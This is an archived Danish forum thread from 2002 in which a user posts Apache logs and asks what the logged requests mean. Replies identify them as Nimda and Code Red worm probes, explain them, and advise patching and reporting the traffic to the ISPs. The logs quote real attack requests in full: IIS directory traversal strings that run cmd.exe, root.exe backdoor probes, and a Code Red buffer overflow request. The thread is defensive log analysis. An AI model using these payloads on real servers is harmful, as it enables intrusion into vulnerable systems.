/ Forside / Teknologi / Internet / Sikkerhed / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
Sikkerhed
#NavnPoint
stl_s 37026
arlet 26827
miritdk 20260
o.v.n. 12167
als 8951
refi 8694
tedd 8272
BjarneD 7338
Klaudi 7257
10  molokyle 6481
Hjælp til log-fil, Apache http server på w~
Fra : Anders Fiedel


Dato : 17-08-02 23:24

Hej,

Er der nogen der kan fortælle mig hvad pågældende gæst har prøvet på her.
Og hvad er det for filer der er forsøgt eksekveret, de eksisterer åbenbart
ikke.
Jeg har fast IP og skal til og have et site op og stå, serveren er apache på
Win2k.
Det eneste der ligger på serveren er en dummy side til test. Så gæsten kan
ikke have gået efter noget specifikt.
Håber der er nogen der kan hjælpe/tyde dette.

Acces LOG
80.62.51.126 - - [17/Aug/2002:10:01:57 +0200] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.62.51.126 - - [17/Aug/2002:10:01:59 +0200] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.62.51.126 - - [17/Aug/2002:10:02:01 +0200] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.62.51.126 - - [17/Aug/2002:10:02:03 +0200] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.62.51.126 - - [17/Aug/2002:10:02:05 +0200] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
80.62.51.126 - - [17/Aug/2002:10:02:08 +0200] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
80.62.51.126 - - [17/Aug/2002:10:02:10 +0200] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
80.62.51.126 - - [17/Aug/2002:10:02:12 +0200] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
80.14.34.74 - - [17/Aug/2002:13:34:20 +0200] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 286
80.14.34.74 - - [17/Aug/2002:13:34:25 +0200] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 284
80.14.34.74 - - [17/Aug/2002:13:34:31 +0200] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.14.34.74 - - [17/Aug/2002:13:34:34 +0200] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.14.34.74 - - [17/Aug/2002:13:34:37 +0200] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
80.14.34.74 - - [17/Aug/2002:13:34:43 +0200] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 325
80.14.34.74 - - [17/Aug/2002:13:34:46 +0200] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 325
80.14.34.74 - - [17/Aug/2002:13:34:49 +0200] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 341
80.14.34.74 - - [17/Aug/2002:13:34:51 +0200] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.14.34.74 - - [17/Aug/2002:13:34:57 +0200] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.14.34.74 - - [17/Aug/2002:13:35:00 +0200] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.14.34.74 - - [17/Aug/2002:13:35:03 +0200] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.14.34.74 - - [17/Aug/2002:13:35:15 +0200] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
63.228.146.7 - - [17/Aug/2002:13:53:05 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 328


Error LOG

[Sat Aug 17 10:02:12 2002] [error] [client 80.62.51.126] File does not
exist: f:/wwwroot/scripts/..%2f/winnt/system32/cmd.exe
[Sat Aug 17 13:34:20 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/scripts/root.exe
[Sat Aug 17 13:34:25 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/msadc/root.exe
[Sat Aug 17 13:34:31 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/c/winnt/system32/cmd.exe
[Sat Aug 17 13:34:34 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/d/winnt/system32/cmd.exe
[Sat Aug 17 13:34:37 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/scripts/..%5c/winnt/system32/cmd.exe
[Sat Aug 17 13:34:43 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/_vti_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
[Sat Aug 17 13:34:46 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/_mem_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
[Sat Aug 17 13:34:49 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/msadc/..%5c/..%5c/..%5c/..Á/..Á/..Á/winnt/system32/cmd.exe
[Sat Aug 17 13:34:51 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/scripts/..Á/winnt/system32/cmd.exe
[Sat Aug 17 13:35:00 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/scripts/..À¯/winnt/system32/cmd.exe
[Sat Aug 17 13:35:03 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/scripts/..Áo/winnt/system32/cmd.exe
[Sat Aug 17 13:53:05 2002] [error] [client 63.228.146.7] Client sent
malformed Host header




 
 
Himbergeist (18-08-2002)
Kommentar
Fra : Himbergeist


Dato : 18-08-02 01:30

> Er der nogen der kan fortælle mig hvad pågældende gæst har prøvet på her.
> Og hvad er det for filer der er forsøgt eksekveret, de eksisterer åbenbart
> ikke.
Ligner et typisk angreb fra en eller anden inficeret IIS.
Ejeren af maskinen aner sandsynligvis ikke at han er angrebet.

> Jeg har fast IP og skal til og have et site op og stå, serveren er apache

> Win2k.

Da du bruger apache kan du lystigt ignorere den.
Den eneste skade den gør er at fylde dine access.log filer med støj.


- cep



Anders Fiedel (18-08-2002)
Kommentar
Fra : Anders Fiedel


Dato : 18-08-02 02:07

Takker,
Hvad er det bedste at gøre for at beskytte min server og resten af den PC
mod angreb.
Jeg har Sygate Pro kørende, men er det nok og skal den konfigureres specielt
eller kører den bare.

Anders

"Himbergeist" <REMOVEsnurrberget@yahoo.com> skrev i en meddelelse
news:3d5eeb85$0$94714$edfadb0f@dspool01.news.tele.dk...
> > Er der nogen der kan fortælle mig hvad pågældende gæst har prøvet på
her.
> > Og hvad er det for filer der er forsøgt eksekveret, de eksisterer
åbenbart
> > ikke.
> Ligner et typisk angreb fra en eller anden inficeret IIS.
> Ejeren af maskinen aner sandsynligvis ikke at han er angrebet.
>
> > Jeg har fast IP og skal til og have et site op og stå, serveren er
apache
> på
> > Win2k.
>
> Da du bruger apache kan du lystigt ignorere den.
> Den eneste skade den gør er at fylde dine access.log filer med støj.
>
>
> - cep
>
>



Kasper Dupont (18-08-2002)
Kommentar
Fra : Kasper Dupont


Dato : 18-08-02 13:26

Anders Fiedel wrote:
>
> Takker,
> Hvad er det bedste at gøre for at beskytte min server og resten af den PC
> mod angreb.

De konkrete angreb har du allerede sikret dig mod ved at vælge en anden
webserver end lige netop IIS. Og uanset hvilken software man bruger, skal
man sørge for at opdatere den hurtigst muligt, når der bliver rettet fejl
med indflydelse på sikkerheden.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Carsten Nielsen (18-08-2002)
Kommentar
Fra : Carsten Nielsen


Dato : 18-08-02 14:39

"Anders Fiedel" <fiedel@c.dk> wrote in message news:<3d5eccf6$0$94733$edfadb0f@dspool01.news.tele.dk>...
> Hej,
>
> Er der nogen der kan fortælle mig hvad pågældende gæst har prøvet på her.
> Og hvad er det for filer der er forsøgt eksekveret, de eksisterer åbenbart
> ikke.
> Jeg har fast IP og skal til og have et site op og stå, serveren er apache på
> Win2k.
> Det eneste der ligger på serveren er en dummy side til test. Så gæsten kan
> ikke have gået efter noget specifikt.
> Håber der er nogen der kan hjælpe/tyde dette.
>
> Acces LOG
> 80.62.51.126 - - [17/Aug/2002:10:01:57 +0200] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307

cmd.exe er den der eksekverer det der svarer til DOS kommandoer, dir,
delete, mkdir etc. Når der står dir efter det, må det være et forsøg
på at liste nogle filer.

> 80.62.51.126 - - [17/Aug/2002:10:01:59 +0200] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.62.51.126 - - [17/Aug/2002:10:02:01 +0200] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.62.51.126 - - [17/Aug/2002:10:02:03 +0200] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.62.51.126 - - [17/Aug/2002:10:02:05 +0200] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
> 80.62.51.126 - - [17/Aug/2002:10:02:08 +0200] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
> 80.62.51.126 - - [17/Aug/2002:10:02:10 +0200] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
> 80.62.51.126 - - [17/Aug/2002:10:02:12 +0200] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308

Samme kommentar, det er forskellige måder at kalde kommandoen på, alt
efter hvor cmd.exe ligger på systemet.

> 80.14.34.74 - - [17/Aug/2002:13:34:20 +0200] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 286
> 80.14.34.74 - - [17/Aug/2002:13:34:25 +0200] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 284

Her er det root.exe virusen vil starte. Hvad root.exe laver ved jeg
ikke lige.

> 80.14.34.74 - - [17/Aug/2002:13:34:31 +0200] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
> 80.14.34.74 - - [17/Aug/2002:13:34:34 +0200] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
> 80.14.34.74 - - [17/Aug/2002:13:34:37 +0200] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
> 80.14.34.74 - - [17/Aug/2002:13:34:43 +0200] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 325
> 80.14.34.74 - - [17/Aug/2002:13:34:46 +0200] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 325
> 80.14.34.74 - - [17/Aug/2002:13:34:49 +0200] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 341
> 80.14.34.74 - - [17/Aug/2002:13:34:51 +0200] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.14.34.74 - - [17/Aug/2002:13:34:57 +0200] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.14.34.74 - - [17/Aug/2002:13:35:00 +0200] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.14.34.74 - - [17/Aug/2002:13:35:03 +0200] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.14.34.74 - - [17/Aug/2002:13:35:15 +0200] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291

Igen cmd.exe + dir for nogle flere steder på systemet.

> 63.228.146.7 - - [17/Aug/2002:13:53:05 +0200] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
> u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 400 328
>

Dette er et forsøg på buffer overrun. NNN'erne skal fylde bufferen og
resten blever skrevet oveni en del af program-koden, som man så kalder
før eler siden.
>
> Error LOG
>
> [Sat Aug 17 10:02:12 2002] [error] [client 80.62.51.126] File does not
> exist: f:/wwwroot/scripts/..%2f/winnt/system32/cmd.exe
> [Sat Aug 17 13:34:20 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/scripts/root.exe
> [Sat Aug 17 13:34:25 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/msadc/root.exe
> [Sat Aug 17 13:34:31 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/c/winnt/system32/cmd.exe
> [Sat Aug 17 13:34:34 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/d/winnt/system32/cmd.exe
> [Sat Aug 17 13:34:37 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/scripts/..%5c/winnt/system32/cmd.exe
> [Sat Aug 17 13:34:43 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/_vti_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
> [Sat Aug 17 13:34:46 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/_mem_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
> [Sat Aug 17 13:34:49 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/msadc/..%5c/..%5c/..%5c/..Á /..Á /..Á /winnt/system32/cmd.exe
> [Sat Aug 17 13:34:51 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/scripts/..Á /winnt/system32/cmd.exe
> [Sat Aug 17 13:35:00 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/scripts/..À¯/winnt/system32/cmd.exe
> [Sat Aug 17 13:35:03 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/scripts/..Áo/winnt/system32/cmd.exe

Da cmd.exe ikke ligger her, blev den ikke fundet.

> [Sat Aug 17 13:53:05 2002] [error] [client 63.228.146.7] Client sent
> malformed Host header

Det er buffer overrunnen som den ikke kunne acceptere. Så Apache er
konstrueret godt nok til at det ikke lykkes.

Med venlig hilsen
Carsten Nielsen

Peder Vendelbo Mikke~ (18-08-2002)
Kommentar
Fra : Peder Vendelbo Mikke~


Dato : 18-08-02 22:47

Anders Fiedel skrev:

> Er der nogen der kan fortælle mig hvad pågældende gæst har prøvet på
> her.

Det er inficerede pcere som forsøger at inficere din maskine, hvis jeg
ikke husker forkert et det Nimda, Code Red og Code Red II.

Kontakt pågældendes udbyder for at få det stoppet, vedkommende der ejer
maskinen ved sikkert ikke at den er inficeret. Ud fra din logfil med
tidsstempel, kan udbyderen finde ud af hvem kunden er.

> Acces LOG
> 80.62.51.126

<URL: http://samspade.org/t/lookat?a=80.62.51.126 >

TDC, kontakt csirt(hos)csirt.dk

> 80.14.34.74

<URL: http://samspade.org/t/lookat?a=80.14.34.74 >

Wanadoo-kunde i frankrig, kontakt abuse(hos)francetelecom.net

> 63.228.146.7

<URL: http://samspade.org/t/lookat?a=63.228.146.7 >

Kontakt abuse(hos)uswest.net
--
Fix Outlook Express 5.*. Nu med emoticons, _understreget_,
/skråtstillet/ og *fed* tekst: <URL: http://flash.to/oe-quotefix >


Kasper Dupont (19-08-2002)
Kommentar
Fra : Kasper Dupont


Dato : 19-08-02 07:56

Peder Vendelbo Mikkelsen wrote:
>
> Anders Fiedel skrev:
>
> > Er der nogen der kan fortælle mig hvad pågældende gæst har prøvet på
> > her.
>
> Det er inficerede pcere som forsøger at inficere din maskine, hvis jeg
> ikke husker forkert et det Nimda, Code Red og Code Red II.

Code Red angreb udgør kun en meget lille procentdel af angrebene.
Code Red II eksisterer ikke mere, den havde indbygget en selv-
destruktion. Så i dag er der stort set kun Nimda angrebene
tilbage.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Søg
Reklame
Statistik
Spørgsmål : 177558
Tips : 31968
Nyheder : 719565
Indlæg : 6408929
Brugere : 218888

Månedens bedste
Årets bedste
Sidste års bedste